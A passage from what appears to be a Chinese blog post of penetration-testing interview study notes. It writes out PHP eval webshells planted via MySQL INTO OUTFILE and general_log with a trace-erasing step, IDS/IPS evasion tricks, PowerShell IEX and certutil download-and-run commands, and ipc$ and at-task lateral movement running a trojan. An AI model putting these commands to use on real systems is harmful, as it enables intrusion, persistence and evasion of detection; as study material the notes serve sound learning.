<li>写入一句话木马<pre><code>select &#39;&lt;?php @eval($POST[1]); ?&gt;&#39; INTO OUTFILE &#39;D:\\phpStudy\\PHPTutorial\\WWW\\a.php&#39;
这里需要注意的一个点是路径需要用”\“
</code></pre>
</li>
</ol>
<h4 id="利用全局日志写shell"><a href="#利用全局日志写shell" class="headerlink" title="利用全局日志写shell"></a>利用全局日志写shell</h4><h5 id="利用过程-1"><a href="#利用过程-1" class="headerlink" title="利用过程"></a>利用过程</h5><ol>
<li>查看配置<pre><code>SHOW VARIABLES LIKE ‘%general%
查看mysql的日志状态，默认是关闭的
general_log_file为日志保存的位置
</code></pre>
</li>
<li>开启general_log模式<pre><code>set global general_log = on;
记录用户输入的每条命令并保存在 C:\phpStudy\MySQL\data\stu1.log 的文件中
开启general_log之后把general_log_file的值修改为该网站默认路径下的某一个自定义的php文件中，然后通过log日志进行写入一句话木马，然后再进一步利用
</code></pre>
</li>
<li>修改日志目录为shell地址<pre><code>set global general_log_file=&#39;C:\\phpStudy\\MySQL\\data\\shell.php&#39;;
</code></pre>
</li>
<li>写入shell并连接利用<pre><code>select &#39;&lt;?php eval($_POST[cmd]);?&gt;&#39;
</code></pre>
</li>
<li>抹除痕迹<pre><code>set global general_log_file=&#39;C:\\phpStudy\\MySQL\\data\\stu1.log&#39;;
set global general_log = off;
SHOW VARIABLES LIKE &#39;%general%&#39;
</code></pre>
</li>
</ol>
<h2 id="IDS-IPS绕过思路"><a href="#IDS-IPS绕过思路" class="headerlink" title="IDS/IPS绕过思路"></a>IDS/IPS绕过思路</h2><p>  入侵检测系统 (IDS) 和入侵防护系统 (IPS)<br>  与防火墙相似，IPS 内嵌部署到流量中。IPS 是一个主动的网络组件，会检查每个通过的数据包，并根据其配置和策略采取正确的补救措施。相反，IDS 是一个被动组件，通常不会内嵌部署，而是通过 SPAN 或 TAP 技术监控流量，然后发出通知.</p>
<h4 id="IPS阻断场景"><a href="#IPS阻断场景" class="headerlink" title="IPS阻断场景"></a>IPS阻断场景</h4><ol>
<li>可以建立TCP连接，检查客户端发出的HTTP请求中的特征，如匹配则发rst阻断或HTTP响应替换，用于域名封禁或Web攻击防护；<pre><code>在应用层，一般利用IPS和Web Server对HTTP语法的理解差异
在网络层，一般利用IPS和操作系统协议栈对TCP/IP的处理方式差异
</code></pre>
</li>
<li>不让建立TCP连接，即客户端发syn包时IPS直接回rst，同时后续如有ack包会双向回rst阻断，用于访问控制或端口封禁；<pre><code>暴露面比较窄，绕过会困难一点，但也不是不可能
</code></pre>
</li>
<li>DNS查询场景，伪造DNS响应，劫持网站域名用于封禁或者钓鱼攻击；<pre><code>换个DNS Server就行了
</code></pre>
</li>
<li>UDP传输场景下，伪造ICMP响应，告知客户端UDP端口不可达。<pre><code>阻断UDP访问
</code></pre>
</li>
</ol>
<h4 id="绕过思路"><a href="#绕过思路" class="headerlink" title="绕过思路"></a>绕过思路</h4><ol>
<li>TCP分片<br>  一些IPS是字节级逐包检查的，并没有实现TCP分片重组能力，那就把关键字拆到两个TCP包里面就可以暗度陈仓。<br>  有的IPS虽然有TCP分片重组能力，但是超时就不会再检查了，所以设置这个sleep的时间超过IPS的分片重组超时值而又没有达到操作系统和Web Server的超时值，那就可以绕过。<br><a href="https://smms.app/image/7GCwVLDKzMjYHhS" target="_blank"><img src="https://s2.loli.net/2024/03/21/7GCwVLDKzMjYHhS.png" ></a></li>
<li>IP分片<br>  构造IP包就需要用到Python下的组件Scapy，TCP三次握手后用Scapy的fragment函数按600字节一个拆分发送IP分片包（当然也可以把syn包也分片）<br>  但是实测有些路由会丢弃MTU比较小的IP包。<br>  nmap有一个规避FW/IDS的功能就是利用IP分片进行端口扫描，参数是-f，可以用–mtu设置分片大小，最小的值是8。</li>
<li>DOS攻击</li>
<li>伪造TCP状态（fuzz）<br>  基于状态跟踪的IPS ———— 简单测试检测模式，不建立TCP连接直接发HTTP请求，如果还有响应的IPS就是包过滤，反之则是状态跟踪。<br>  建立TCP连接后，我们可以<strong>发送一个定制TTL值的rst包，这个TTL值正好能够经过IPS但不会到达服务端，IPS基于状态跟踪会认为这个TCP连接已断开，后续的各种包都不会去检测，但服务端不受影响会继续等待ack包来。</strong></li>
<li>IPv6绕过<br>  正在服役的IDS/IPS/WAF不一定支持，于是可以畅行无阻。</li>
</ol>
<h2 id="Redis-getshell"><a href="#Redis-getshell" class="headerlink" title="Redis getshell"></a>Redis getshell</h2><h4 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h4><ul>
<li>通过向Web目录中写webshell的方式进行getshell</li>
<li>通过写SSH key的方式进行getshell</li>
<li>通过写corntab的方式进行getshell</li>
</ul>
<h4 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h4><ul>
<li>利用powershell反弹shell</li>
<li>利用mshta.exe</li>
</ul>
<h2 id="Log4j漏洞原理"><a href="#Log4j漏洞原理" class="headerlink" title="Log4j漏洞原理"></a>Log4j漏洞原理</h2><p>  主要原理是利用log4j2的日志输出jndi远程对象时，调用远程对象没做检查导致。<br>  当用户浏览器注入变量，后台应用程序对变量做了日志输出就会发生远程对象的调用，远程对象又没有经过检查，直接在我们的应用程序中运行。<br><a href="https://smms.app/image/4zeJSlKdGMHFs6C" target="_blank"><img src="https://s2.loli.net/2024/03/21/4zeJSlKdGMHFs6C.png" ></a></p>
<h2 id="数据库利用姿势"><a href="#数据库利用姿势" class="headerlink" title="数据库利用姿势"></a><a href="https://github.com/safe6Sec/PentestDB">数据库利用姿势</a></h2><h2 id="Windows远程文件下载"><a href="#Windows远程文件下载" class="headerlink" title="Windows远程文件下载"></a>Windows远程文件下载</h2><h4 id="PowerShell"><a href="#PowerShell" class="headerlink" title="PowerShell"></a>PowerShell</h4><pre><code>Invoke-WebRequest -Uri 目标url -OutFile 目标文件位置

powershell (new-object System.Net.WebClient).DownloadFile(&#39;目标文件地址&#39;,&#39;保存路径文件名&#39;)

远程执行命令：
powershell -nop -w hidden -c &quot;IEX ((new-object net.webclient).downloadstring(&#39;目标文件地址&#39;))&quot;
</code></pre>
<h4 id="Bitsadmin"><a href="#Bitsadmin" class="headerlink" title="Bitsadmin"></a>Bitsadmin</h4><p>  BITSAdmin用于创建、下载和上传作业，监视其进度。Windows7及以后的系统自带BitsAdmin工具。</p>
<pre><code>bitsadmin /transfer test http://192.168.1.1:8000/1.txt c:\users\mytools\a.txt 
// 创建一个名为test的bitsadmin任务，从192.168.1.1:8000下载1.txt,保存为c:\users\mytools\a.txt
</code></pre>
<h4 id="Certutil"><a href="#Certutil" class="headerlink" title="Certutil"></a>Certutil</h4><p>  Certutil 是Windows自带的命令行工具，用于备份证书服务，由于certutil下载文件都会留下缓存，所以一般都建议下载完文件后对缓存进行删除。<br>  目录为：<code>%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content</code></p>
<pre><code>certutil -urlcache -split -f http://192.168.1.1:8000/shell.exe c:\users\public\shell.exe 
//从192.168.1.1:8000下载shell.exe到本地c:\users\public\目录下
</code></pre>
<p><a href="https://smms.app/image/Ki24ZBd6l3vqWme" target="_blank"><img src="https://s2.loli.net/2024/03/21/Ki24ZBd6l3vqWme.png" ></a></p>
<h4 id="wget"><a href="#wget" class="headerlink" title="wget"></a>wget</h4><p><code>wget -b -O filename http://example.com</code>默认覆盖文件</p>
<h4 id="ipc-文件共享"><a href="#ipc-文件共享" class="headerlink" title="ipc$文件共享"></a>ipc$文件共享</h4><p>  IPC$(Internet Process Connection)是共享”命名管道”的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。<br>  <strong>漏洞利用条件：</strong><br>  目标主机开启了139和445端口<br>  目标主机管理员开启了ipc$默认共享</p>
<pre><code>
net use \\DC的IP\ipc$ &quot;password&quot; /user:&quot;username&quot;   //连接主机
net use                             // 查看当前主机所建立的连接
dir \\ip\c$                         //查看主机目录
copy 本地文件地址 \\目标\c$         //传输恶意文件
tasklist /S 主机 /U 用户 /P 密码    // 查看目标主机进程
net use \\IP /del /y                //删除ipc$

&gt;&gt;建立 IPC 常见的错误代码:
5：拒绝访问，可能是使用的用户不是管理员权限，需要先提升权限 
51：网络问题，Windows 无法找到网络路径
53：找不到网络路径，可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有 防火墙等问题
67：找不到网络名，本地 Lanmanworkstation 服务未启动，目标删除 ipc$
1219：提供的凭据和已存在的凭据集冲突，说明已建立 IPC$，需要先删除
1326：账号密码错误
1792：目标 NetLogon 服务未启动，连接域控常常会出现此情况
2242：用户密码过期，目标有账号策略，强制定期更改密码
</code></pre>
<h4 id="at计划任务"><a href="#at计划任务" class="headerlink" title="at计划任务"></a>at计划任务</h4><p>Windows Server 2008之前版本的操作系统中。我们可以通过at命令通过跳板机在目标主机DC上创建一次性计划任务，让计算机在指定的时间执行木马程序，从而获得对内网目标主机的控制。</p>
<pre><code>copy 本地文件地址 \\目标\c$   //传输恶意文件
at \\ip 18:53:00 c:\shell.exe   //创建计划任务，让目标主机DC在指定的时间运行木马
at \\ip 任务ID /delete   //删除任务
</code></pre>
<h2 id="手工判断靶标站点是Windows-Linux"><a href="#手工判断靶标站点是Windows-Linux" class="headerlink" title="手工判断靶标站点是Windows/Linux"></a>手工判断靶标站点是Windows/Linux</h2><ol>
<li>大小写检测：Windows大小写不敏感，而Liunx大小写敏感</li>
<li>PING指令: 根据TTL值，Windows一般情况下&gt;100、Linux则&lt;100</li>
</ol>
<h2 id="常见危险函数"><a href="#常见危险函数" class="headerlink" title="常见危险函数"></a>常见危险函数</h2><p><a href="https://smms.app/image/HFnAkSOw4GYxCNu" target="_blank"><img src="https://s2.loli.net/2024/03/21/HFnAkSOw4GYxCNu.png" ></a></p>
<h2 id="常见脆弱服务端口"><a href="#常见脆弱服务端口" class="headerlink" title="常见脆弱服务端口"></a>常见脆弱服务端口</h2><p><a href="https://smms.app/image/CiRj4UdNqbkSmZD" target="_blank"><img src="https://s2.loli.net/2024/03/21/CiRj4UdNqbkSmZD.png" ></a></p>
<h2 id="正反向shell"><a href="#正反向shell" class="headerlink" title="正反向shell"></a>正反向shell</h2><p><a href="https://smms.app/image/Mzr2vTVBCyhqYLZ" target="_blank"><img src="https://s2.loli.net/2024/03/21/Mzr2vTVBCyhqYLZ.png" ></a></p>
<h2 id="正反向代理"><a href="#正反向代理" class="headerlink" title="正反向代理"></a>正反向代理</h2><p><a href="https://smms.app/image/DnXqU8AJLlZBt4u" target="_blank"><img src="https://s2.loli.net/2024/03/21/DnXqU8AJLlZBt4u.png" ></a></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>  看完这两天的面试题之后发现关于网络通信的部分实在是太重要了，基本功还不是很牢固，要多加学习。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>请我一杯咖啡吧！</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.png" alt="Shunyu 微信">
        <span>微信</span>
      </div>
      <div>
        <img src="/images/alipay.png" alt="Shunyu 支付宝">
        <span>支付宝</span>
      </div>

  </div>
</div>

          <div class="post-tags">
              <a href="/tags/%E6%97%A5%E6%8A%A5/" rel="tag"><i class="fa fa-tag"></i> 日报</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/03/20/%E9%9D%A2%E8%AF%95%E5%A4%8D%E4%B9%A0%E4%B8%80/" rel="prev" title="面试复习一">
                  <i class="fa fa-angle-left"></i> 面试复习一
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/03/22/%E9%9D%A2%E8%AF%95%E5%A4%8D%E4%B9%A0%E4%B8%89/" rel="next" title="面试复习三">
                  面试复习三 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






    <div class="comments" id="valine-comments"></div>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Shunyu</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">157k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">9:31</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/liu1272" class="github-corner" title="在 GitHub 上关注我" aria-label="在 GitHub 上关注我" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.umd.js" integrity="sha256-a+H7FYzJv6oU2hfsfDGM2Ohw/cR9v+hPfxHCLdmCrE8=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/comments.min.js"></script><script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/utils.min.js"></script><script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/motion.min.js"></script><script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/sidebar.min.js"></script><script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/next-boot.min.js"></script><script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/bookmark.min.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/third-party/search/local-search.min.js"></script>

  <script class="next-config" data-name="pdf" type="application/json">{"object_url":{"url":"https://cdnjs.cloudflare.com/ajax/libs/pdfobject/2.3.0/pdfobject.min.js","integrity":"sha256-JJZNsid68vnh3/zyj0lY9BN5ynxVX/12XgOa1TlaYN0="},"url":"/lib/pdf/web/viewer.html"}</script>
  <script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/third-party/tags/pdf.min.js"></script>



  <script src="https://cdn.jsdelivr.net/npm/hexo-theme-next@8.22.0/source/js/third-party/fancybox.min.js"></script>



  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>






<script class="next-config" data-name="valine" type="application/json">{"enable":true,"appId":"Saj0Y9foXlqnIK4Ing0paYci-MdYXbMMI","appKey":"eSefitZxNdI9H6p6lkyRYI5g","serverURLs":"https://saj0y9fo.api.lncldglobal.com","placeholder":"Just go go","avatar":"mm","meta":["nick","mail","link"],"pageSize":10,"lang":"zh-cn","visitor":true,"comment_count":true,"recordIP":true,"enableQQ":true,"requiredFields":[],"el":"#valine-comments","path":"/2024/03/21/%E9%9D%A2%E8%AF%95%E5%A4%8D%E4%B9%A0%E4%BA%8C/"}</script>
<script>
document.addEventListener('page:loaded', () => {
  NexT.utils.loadComments(CONFIG.valine.el)
    .then(() => NexT.utils.getScript(
      'https://fastly.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js',
      { condition: window.Valine }
    ))
    .then(() => {
      new Valine(CONFIG.valine);
    });
});
</script>


</body>
</html>
